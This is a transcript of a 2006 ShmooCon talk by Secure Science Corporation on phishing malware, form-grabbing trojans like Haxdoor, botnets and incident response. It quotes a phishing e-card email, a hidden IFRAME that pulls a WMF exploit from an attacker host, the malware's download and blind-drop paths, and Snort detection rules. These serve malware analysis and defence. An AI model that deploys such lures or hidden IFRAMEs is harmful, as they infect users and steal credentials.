Trojans & Botnets & Malware, Oh My!

Download Report

Transcript Trojans & Botnets & Malware, Oh My!

Trojans & Botnets & Malware, Oh My!
Shmoocon ‘06
Lance James
Secure Science Corporation
For Distribution
Copyright 2006 Secure Science Corp.
1
What this talk is about?

Malware
In regards to incident response
 Pre-emptive Techniques
 Research & Development
 Related mainly to theft-intended malware


What is Malware?
Malicious Software/Hardware
 Designed to be harmful

For Distribution
Copyright 2006 Secure Science Corp.
2
Cyber Attack Sophistication
Continues To Evolve
bots
Cross site scripting
Tools
“stealth” / advanced
scanning techniques
High
packet spoofing
sniffers
Intruder
Knowledge
Staged
attack
distributed
attack tools
www attacks
automated probes/scans
denial of service
sweepers
GUI
back doors
network mgmt. diagnostics
disabling audits
hijacking
burglaries sessions
Attack
Sophistication
exploiting known vulnerabilities
password cracking
self-replicating code
Low
Source: CERT
Attackers
password guessing
1980
For Distribution
1985
1990
1995
Copyright 2006 Secure Science Corp.
2000+
3
And Continue To Grow…
85%
Avg reported loss from
attacks was $2.7M per
incident
— CSI/FBI survey
of respondents
had breaches
— CSI/FBI survey
137,000
85%
of the critical
infrastructure is owned
or operated by the
private sector
security incidents in
2003, nearly twice
as many as in 2002
— CERT
For Distribution
Data theft grew more than
650%
over the past 3 years
— CSI/FBI
Source : Carnegie Mellon
Copyright 2006 Secure Science Corp.
4
Growth Or Liability?

Over twenty per cent of Internet users now
access online banking services.
This total will reach 33% by 2006, according to The
Online Banking Report.
 By 2010, over 55 million US households will use
online banking and ePayments services, which are
tipped as "growth areas".
 Wamu buys Providian, BofA buys MBNA


And so what about the ‘Phishing’ threat to
e-commerce?
Source: ePaynews
For Distribution
Copyright 2006 Secure Science Corp.
5
What Is Phishing?

Phishing, also referred to as brand spoofing, as it is a
variation on “fishing,” the idea being that bait is thrown out with
the hopes that while most will ignore the bait, some will be
tempted into biting.



Phishing is the act of sending a communication to a user falsely claiming to
be an established legitimate enterprise in an attempt to scam the user into
surrendering private information that will be used for identity theft.
The communication (usually email) directs the user to visit a Web site where
they are asked to update personal information, such as passwords and credit
card, social security, and bank account numbers, that the legitimate
organization already has.
The Web site, however, is bogus or hostile and set up only to steal the user’s
information.
For Distribution
Copyright 2006 Secure Science Corp.
6
What’s Worse?

Email Phish or Phishing Malware?
Some of the larger phishing groups have associations
with both phishing emails and key-logging malware.
 While phishing email is very effective, the number of
victims is significantly smaller than the victims of
phishing malware.
 Logs recovered from base camps for phishing emails
and malware show a startling difference.

For Distribution
Copyright 2006 Secure Science Corp.
7
Email –vs- Malware
Phishing Emails
Phishing Malware / Keyloggers
Average number of
accounts
compromised in a
week
100
500,000
Type of information
compromised
Name, address, phone, SSN, credit card,
VCC2, bank account numbers,
logins and passwords, and even
items such as mother’s maiden
name or the answer to the “forgot
your password” prompt.
Generally, victims provide all of the
information asked.
Account login, or credit card number
with expiration and address.
Generally, a single victim only loses a
single amount of information. Few
victims lose more than one type of
information. And the information
compromised may not match the
information desired by the phisher.
Volume of data
generated
Each victim = < 500 bytes of data.
1 week = < 50Kbytes.
A single person can process the data in
minutes.
For Distribution
A single key logging Trojan can
generate hundreds of megabytes of
data in a week. The data is not
processed by hand. Instead, scripts
are used to filter the information.
Potentially valuable information is
frequently ignored due to the
Copyright 2006 Secure Science Corp.
8
filtering process.
Email –vs- Malware (cont.)
Phishing Emails
Phishing Malware / Key loggers
How often is the method
viable?
Reused regularly for weeks or months
before requiring a change. Due to
simple changes in the mailing list,
a variety of people can be solicited
– information is almost never
collected from the same person
twice.
Most malware is effective for a week
before anti-virus vendors develop
signatures.
Some phishing groups use malware in
limited distributions. While these
programs may exist for much
longer durations, they generally
collect less information.
A single person that is infected may
compromise the same information
multiple times.
Total development cost
to the phishers?
A single phishing server may take one
week to develop. The server may
then be applied to hundreds of
blind drop servers and reused for
weeks or longer. Changes to the
phishing email content (bait) can
be measured in hours and may not
need a change to the phishing
server.
A single malware system, including
Trojan and receiving server, may
take months to develop. Each
variant may take a week or longer
to develop. When generic antivirus signatures appear,
redevelopment may take weeks or
months.
For Distribution
Copyright 2006 Secure Science Corp.
9
Phishing Malware (cont.)

In November of 2003, the concept of a single
mega-virus changed.
Gaobot, followed by Sasser and Berbew, took a
different tact: rather than one mega-worm, these
consisted of hundreds of variants – each slightly
different.
 The goal of the variant was not to become a megaworm, but rather to infect a small group of systems.

For Distribution
Copyright 2006 Secure Science Corp.
10
Phishing Malware (cont.)

This approach provided two key benefits to the malware
authors:

Limited distribution; limited detection. As long as the malware is
not widespread, the anti-virus vendors would be less likely to detect the
malware. (If Norton doesn’t know about a virus, then they cannot
create a detection signature for the virus.)


For Distribution
Over the last 12 months Secure Science Corporation has identified dozens
of virus variants used by phishers, carders, and generic malware authors
that are not detected by anti-virus software.
Rapid deployment.. Nearly a hundred variants of Sasser were
identified in less than three months. Each variant requires a different
detection signature. The rapid modification and deployment ensures
that anti-virus vendors will overtax their available resources, becoming
less responsive to new strains. It also ensures that some variants will
not be detected.
Copyright 2006 Secure Science Corp.
11
Phishing Malware (cont.)

We’re seeing a significant increase in malware
used by phishing groups.
IE exploitation via ActiveX Blended Threats
 Let’s take a closer look at the malware, and the threat
model behind phishers and their malware.
 Malware key-logging myths

For Distribution
Copyright 2006 Secure Science Corp.
12
Phishing Malware (cont.)

A few phishing groups have been associated with
specific malware.

The malware is used for a variety of purposes:
Compromising hosts for operating the phishing server;
 Compromising hosts for relaying the bulk mailing;
 Directly attacking clients with key-logging software.


A single piece of malware may serve any or all of
these purposes.
For Distribution
Copyright 2006 Secure Science Corp.
13
Malware Trends

In early 2004, the malware associated with phishing groups rarely
appeared to be created specifically for phishing. Instead, was
focused on botnet* attributes:


Email relay. The software opens network services that can be used to relay
email anonymously. This is valuable to phishers, and spammers in general.
Data mining. The malware frequently contains built-in functions for gathering
information from the local system. The gathering usually focuses on software
licenses (for game players , warez, or serialz dealers**) and Internet Explorer
cache. The latter may contain information such as logins. For phishers, this
type of data mining primarily focuses on account logins to phishing targets.
* A compromised system with remote control capabilities is a “bot”. A “botnet” is a
collection of these compromised hosts.
** Illegally distributed software applications (warez) and the associated license keys (serialz)
are frequently available and propagated through the underground software community.
For Distribution
Copyright 2006 Secure Science Corp.
14
Malware Trends (cont.)

Remote control. The malware usually has backdoor
capabilities. This permits a remote user to control and
access the compromised host. For a phisher, there is little
advantage to having a backdoor to a system unless they
plan to use the server for hosting a phishing site. But for
other people, such as virus writers or botnet farmers*,
remote control is an essential attribute.
* A “botnet farmer” is an individual or group that manages and
maintains one or more botnets. The botnet farmers generate revenue
by selling systems or CPU time to other people. Essentially, the botnet
becomes a large timeshare computer network.
For Distribution
Copyright 2006 Secure Science Corp.
15
Malware Trends (cont.)

By Q3 of 2004, a few, large phishing groups had
evolved to support their own specific malware.
While the malware did contain email relays, data
mining functions, and remote control services, these
had been tuned to support phishing specifically.
 Viruses such as W32.Spybot.Worm included specific
code to harvest bank information from compromised
hosts.

For Distribution
Copyright 2006 Secure Science Corp.
16
Malware Trends (cont.)

A few phishing groups also appeared associated
with key logging software.

While not true “key logging”, these applications
capture data submitted (posted) to web servers.

For Distribution
A true key logger would generate massive amounts of data
and would be difficult for an automated system to identify
account and login information.
Copyright 2006 Secure Science Corp.
17
Malware Trends (cont.)

Instead, these applications hook into Internet
Explorer’s (IE) form submission system.
All data from the submitted form is relayed to a blind
drop operated by the phishers.
 The logs contain information about the infected
system, as well as the URL and submitted form
values.
 More importantly, the malware intercepts the data
before it enters any secure network tunnel, such as
SSL or HTTPS.

For Distribution
Copyright 2006 Secure Science Corp.
18
Malware Trends (cont.)

Examples of data output:

Recent examples of HaxDoor, Berbew and
PWS.Banker reveal similar “Formgrabbing”

reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer
_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******

onlineid.bankofamerica.com/cgi-bin/sso.login.controller

[11023586123662948896]

[IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

Distributed through IE Class-ID attacks
ADB/CHM
 IFRAME TAG
 Javaprxy???

For Distribution
Copyright 2006 Secure Science Corp.
19
Side-Bar, Case Example


Anti-Malware Snake-Oil

Virtual Keyboards

Key-board Logging Protection

Scramble Pads

Anti-Spyware Desktop software
99% of Information Theft Malware doesn’t log
key strokes! (it’s unscalable)
For Distribution
Copyright 2006 Secure Science Corp.
20
Side-Bar, Case Example (cont)
For Distribution
Copyright 2006 Secure Science Corp.
21
Malware Trends (cont.)

The end of 2004 showed a significant modification to the malware
used by some phishing groups.


The prior key logging systems generated gigabytes of data in a very short
time. This made data mining difficult, since only a few sites were of
interest to the phishers.
By the end of 2004 and into 2005, the phishers had evolved their software.



For Distribution
Loggers focus on specific URLs, such as the web logins to Citibank and Bank
of America.
It is believed that this was intended to pre-filter the data collected by the
malware. Rather than collecting all of the submitted data, only submitted data
of interest was collected.
More importantly, multiple viruses appeared with this capability – indicating
that multiple phishing groups evolved at the same time. This strongly suggests
that malware developers associated with phishers are in communication or have
a common influencing source.
Copyright 2006 Secure Science Corp.
22
Malware Trends (cont.)

PG02 significant attack pattern identified

Cpanel (WebISP in a box) exploitation




System compromise
Payload launch
www.site.com/images/newex.html
Hijacks Network or Box for Spamming



Sending Spam
Uses DMS generation 2
Enabling anonymity


Object Class Exploits for IE


Uses Dark IP space for forged receive header
Trojan Downloader payload
Classifies malware as “MSITS.exe”



For Distribution
Reference to MS-ITS protocol attacks
Uses GPL code from www.edup.tudelft.nl/~bjwever/
Berend-Jan Wever website
Copyright 2006 Secure Science Corp.
23
Malware Trends (cont.)

Object Class attacks not “brand new”




Uses older ADB Exploit even though newer attacks exist
January-February 2005 haxdoor variants existed on for win98
Suggests targeting “End of Life” product
Win98 EOL on security upgrades



No education on phishing
No SP2, built in pop-up blockers
Evolutionary pattern




Suggests Path of Least Resistance
Evolve when necessary
Win98 is plentiful and best target!
Why Move??
For Distribution
Copyright 2006 Secure Science Corp.
24
Latest Threats

WMF exploit




Discovered by Dan Hubbard (WebSense)
Found in the wild as a 0-day
Phishers were using it from Day 0
It was supposed to be patched in November


MS05-053
Nuclear Grabber used by Phishing Group #02

Written by Corpse (Author of A-311 Death and Nuclear
Grabber)



AV Vendors call it Haxdoor
Sells software on Corpsespyware.net from $250.00 to $2500.00
Russian sales only
For Distribution
Copyright 2006 Secure Science Corp.
25
Phishing Trends (cont.)

Serial Pattern for process of Haxdoor








Successor to Berbew malware from 2004
Very likely relation to original Berbew authors
’05 Berbew marked with Corpse’s Signature
Haxdoor malware written in Assembly
Trojan Creation Kit
Compiles with permutations
Packed with FSG
Easy for Phishers to compile on the fly with customized Settings.
For Distribution
Copyright 2006 Secure Science Corp.
26
Latest Threats
For Distribution
Copyright 2006 Secure Science Corp.
27
Latest Threats

Email from Phishing Group for WMF exploit
Dear Friend,
Friends [ fromfriends at aol.com ] has sent you an e-card from
<A href="http://123Greetings.com">123Greetings.com</A> .
<A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances,
healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express
yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words
and music.
Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may
save it on your computer or take a print.
To view your e-card, choose from any of the following options:
<a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a
href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td
></tr></table></a>
For Distribution
Copyright 2006 Secure Science Corp.
28
What AV does with this?

Identify the Threat, Label it - Here’s their analysis
For Distribution
Copyright 2006 Secure Science Corp.
29
Problem?

Problem exists here




How do we change this?




For Distribution
Labeled Low Threat based on AV metrics
Shoved in with the rest of the Trojan.small.em
No known resolve other than desktop prevention
 Very reactive, (as we all know)
 Evolving malware disables AV (common knowledge)
Change the AV metric
Use common sense
Proactive, not reactive
Serial Pattern analysis w/ common sense is key
Copyright 2006 Secure Science Corp.
30
Incident Response

Emerging Threats




Management by Objective
Per incident basis
Threat modelling necessary (but usually never happens)
Malware author grouping


Serial Pattern
Pre-emptive Signatures


For Distribution
Forces them to evolve (ROI lowers)
Possible Apprehension
Copyright 2006 Secure Science Corp.
31
R&D + IR=Proactive

Research for Haxdoor



<IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0
hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>
Grabs msits.exe from www.site.com/images/msits.exe
Packed with FSG (marked with Corpse Signature within Packing)
003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.com
003C1BE0 PUSH ies4dll.003C11C9 ASCII "images/data.php“


Blind drop Identified
Data recovered in realtime

For Distribution
Phishing the Phishers
Copyright 2006 Secure Science Corp.
32
Data Recovery
For Distribution
Copyright 2006 Secure Science Corp.
33
Impact DOA

Blind drop log monitoring



Data returned to institution that’s compromised
Real-time risk mitigation
Pre-emptive Action

What do we know?

Packed with FSG





How many non-malicious executables are packed with FSG
Talks to /images/data.php
Some versions /images/dat7.php and /images/bsrv.php
Group titles it msits.exe and msys.exe
Bleeding-Edge Snort

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsepsyware.net - PG 02
Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojanactivity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02
Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojanactivity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
For Distribution
Copyright 2006 Secure Science Corp.
34
Outcome

Snort Sigs

Prevent a large amount of new phishing malware



Corpse has to change his method
Many other phishing malware packed same way
Problem response vs Incident Response

Look at overall problem

Example: Form Grabbing


For Distribution
Assume everyone is infected
How do we solve this?
Copyright 2006 Secure Science Corp.
35
Example: Form Grabbing
For Distribution
Copyright 2006 Secure Science Corp.
36
So you’re not a RCE

Tricks for IR

IEHTTPHEADERS



BHO and IE hooks
Uses IE as Agent
Locate Blind Drop


VMWare




Monitor and Mitigate
Sandbox (with snapshots)
Tools like sysinternals, Ollydbg, winpooch
Joe Stewart has some new tools for sandnet
As it becomes more prevalent


For Distribution
More tools available for the common response team
Common sense is sometimes the best weapon
Copyright 2006 Secure Science Corp.
37
Contact Info
Secure Science Corporation
7770 Regents Rd.
Suite 113-535
San Diego, CA. 92122-1967
(877)570-0455
http://www.securescience.net
Email: [email protected]
Lance James ~ CTO
For Distribution
Copyright 2006 Secure Science Corp.
38
Questions
For Distribution
Copyright 2006 Secure Science Corp.
39